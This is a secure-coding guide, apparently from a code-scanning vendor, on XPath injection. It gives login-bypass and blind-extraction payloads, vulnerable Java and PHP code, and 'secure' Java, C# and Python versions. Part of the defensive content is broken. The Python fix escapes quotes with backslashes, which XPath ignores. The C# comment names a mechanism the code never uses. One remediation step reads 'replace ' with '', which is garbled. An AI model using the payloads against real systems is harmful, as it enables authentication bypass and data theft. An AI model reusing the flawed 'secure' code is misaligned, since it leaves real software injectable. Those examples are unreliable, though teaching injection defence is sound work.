What is XPath Injection?
XPath injection occurs when user-supplied input is embedded into an XPath query expression without proper encoding or parameterization. XPath is a query language for navigating XML documents, similar in concept to SQL for relational databases. When an application uses XPath to query an XML-based datastore (configuration files, user databases, SOAP services), unsanitized user input can alter the query logic.
Attackers can exploit XPath injection to bypass authentication (similar to SQL injection 1=1 attacks), extract data from any part of the XML document, and in blind scenarios enumerate the entire document structure character by character.
How exploitation works
A login form queries an XML user database:
String query = "//user[name/text()='" + username + "' and password/text()='" + password + "']";
An attacker enters ' or '1'='1 as both username and password:
//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']
This selects all <user> nodes, returning the first user (typically admin) and bypassing authentication entirely.
Blind XPath injection uses substring() and string-length() to extract node values one character at a time:
username: ' or substring(//user[1]/password/text(),1,1)='a
Vulnerable code examples
Java — XPath with user input
// VULNERABLE: User input directly embedded in XPath expression
public boolean login(String username, String password) throws Exception {
XPathFactory xpf = XPathFactory.newInstance();
XPath xpath = xpf.newXPath();
String expr = "//user[name='" + username + "' and password='" + password + "']";
NodeList nodes = (NodeList) xpath.evaluate(expr, xmlDoc, XPathConstants.NODESET);
return nodes.getLength() > 0;
}
PHP — XPath query construction
// VULNERABLE: User input in XPath query
$xpath = new DOMXPath($doc);
$query = "//users/user[username='" . $_POST['username'] . "']";
$results = $xpath->query($query);
Secure code examples
Java — parameterized XPath with variable resolver
// SECURE: Use XPath variable binding to separate query from data
public boolean login(String username, String password) throws Exception {
XPathFactory xpf = XPathFactory.newInstance();
XPath xpath = xpf.newXPath();
// Bind variables so user input is never concatenated into the expression
xpath.setXPathVariableResolver(variableName -> {
if ("username".equals(variableName.getLocalPart())) return username;
if ("password".equals(variableName.getLocalPart())) return password;
return null;
});
String expr = "//user[name=$username and password=$password]";
NodeList nodes = (NodeList) xpath.evaluate(expr, xmlDoc, XPathConstants.NODESET);
return nodes.getLength() > 0;
}
C# — XPathNavigator with parameterized query
// SECURE: Use XPathExpression with XsltArgumentList for variable substitution
public bool Login(XPathNavigator nav, string username, string password)
{
// Sanitize by allowing only expected character ranges
if (!Regex.IsMatch(username, @"^[a-zA-Z0-9_.-]{1,50}$"))
return false;
if (!Regex.IsMatch(password, @"^[a-zA-Z0-9!@#$%^&*]{1,100}$"))
return false;
// Now safe to embed in expression after allow-list validation
string expr = $"//user[name='{username}' and password='{HashPassword(password)}']";
return nav.SelectSingleNode(expr) != null;
}
Python — input allow-list validation
import re
from lxml import etree
def login(xml_doc, username, password):
# SECURE: Strict allow-list validation before embedding in XPath
if not re.match(r'^[a-zA-Z0-9_\-\.]{1,50}$', username):
return False
# Use parameterized Saxon-style or escape quotes
safe_username = username.replace("'", "\\'")
safe_password_hash = hash_password(password)
tree = etree.fromstring(xml_doc)
result = tree.xpath(f"//user[name='{safe_username}' and password_hash='{safe_password_hash}']")
return len(result) > 0
What Offensive360 detects
- String concatenation in XPath expressions —
xpath.evaluate(),xpath.query(), orselectNodes()calls where the expression includes tainted data - User input in XPath filter predicates —
[field='+ userInput +']patterns in XPath strings - Missing variable binding — XPath evaluation without
XPathVariableResolveror equivalent parameterization mechanism - Absence of input validation — No allow-list or format check before user input is used in XPath
Remediation guidance
-
Use XPath variable binding — Most XPath APIs support parameterized queries via variable resolvers (Java
XPathVariableResolver, SaxonXdmValueparameters). Always prefer this over string concatenation. -
Apply strict allow-list validation — If parameterized queries are unavailable, restrict username, ID, and other queried fields to known-safe character sets (alphanumeric, limited punctuation).
-
Avoid storing auth data in XML — For authentication, use a relational or document database with proper parameterized query support rather than flat XML files.
-
Escape single quotes at minimum — If parameterization is unavailable and allow-list validation is not possible, replace
'with'in string values used in XPath expressions. -
Validate XML document structure — Ensure XML datastores are validated against an XSD schema so injected content that alters document structure is rejected at parse time.